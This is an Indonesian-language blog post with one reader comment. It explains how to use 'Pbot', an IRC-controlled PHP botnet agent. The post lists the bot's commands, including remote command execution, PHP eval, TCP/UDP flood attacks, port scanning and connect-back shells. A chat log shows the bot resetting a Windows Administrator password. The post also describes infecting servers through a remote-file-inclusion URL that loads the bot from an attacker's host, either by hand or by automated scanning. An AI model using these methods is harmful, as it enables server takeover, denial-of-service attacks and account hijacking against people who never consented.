Menjalankan Botphp Pbot

Menjalankan Botphp Pbot
Pbot Adalah botphp, yang saat ini banyak sekali yang menggunakan Pbot ini, selain gampang penggunaannya dan juga lumayan lengkap perintah-perintah di dalamnya, di bandingkan dengan botphp yang lain.
Pbot Php For Botscan

Pbot saat menjalankan perintah.

Command Pbot :

.user <password> //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail <to> <from> <subject> <msg> //send an email
.dns <IP|HOST> //dns lookup
.download <URL> <filename> //download a file
.exec <cmd> // uses exec() //execute a command
.sexec <cmd> // uses shell_exec() //execute a command
.cmd <cmd> // uses popen() //execute a command
.info //get system information
.php <php code> // uses eval() //execute php code
.tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
.udpflood <target> <packets> <packetsize> <delay> //udpflood attack
.raw <cmd> //raw IRC command
.rndnick //change nickname
.pscan <host> <port> //port scan
.safe // test safe_mode (dvl)
.inbox <to> // test inbox (dvl)
.conback <ip> <port> // conect back (dvl)
.uname // return shell’s uname using a php function (dvl)

Log Chat Saat Menjalankan Perintah :

.sexec net user Administrator shinchi
.sexec net user
Administrator
.sexec net user

Penjelasan Perintah Di atas :

net user Administrator shinchi <- Mengganti password Administrator menjadi shinchi
net user Administrator <- Melihat status Administrator
net user <- Melihat User yang memiliki Akses pada komputer.

Cara Menjalankan Pbot :

Seperti Kebanyakan botphp, Pbot juga di jalankan dengan cara menginjekan source code dari Pbot ke target.

Seperti contoh :

Target Vuln Pbot

http://www.target.com/page?body=http://host.kamu/filepbot.txt?
Ada 2 macam cara Meng-inject dengan Pbot :

1. Inject langsung.

2. Botscan

1. Inject Langsung :

Dimana Target Vuln Pbot Di inject-kan langsung, sehingga menjadi seperti injectkan biasa, dan juga membutuhkan kesabaran, jikalau targetnya tidak dapat menjalankan Pbot.

2. Botscan.

Yaitu Dengan manambahkan atau mengganti cmd botscan menjadi file Pbot, sehingga Botscan yang melakukan Scan terhadap bug jika mendapatkan target, akan langsung di inject dengan file Pbot tadi.

Pbot, Bagus di jalankan pada server windows, soalna rata2 target yang bersafe mode ON dapat di gunakan untuk meload Pbot.

Kalau ada target yang bersafe mode OFF untuk apa meload Pbot, mending Load Botscan saja kan.

source code pbot :

souce di atas adalah pbot yang di gunakan di server dalnet, sedangkan yang di bawah ini adalah source Pbot yang di server indoirc.

Souce code Pbot :
Source Pbot

Tulisan ini Juga Di posting di : www.samada.wordpress.com

One Response to “Menjalankan Botphp Pbot”

  1. sori mas…saya newbie ni ..kayak nya enak jg ini pake shell..
    ajarin cara buat nya dong.. n cara injeknya…trs trang saya ga ngerti ttg linux.. kalo pake windows gmn…tolong ya mass………
    thanksss
    ke e-mail saya aj ya mas…
    tq skali lagi…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: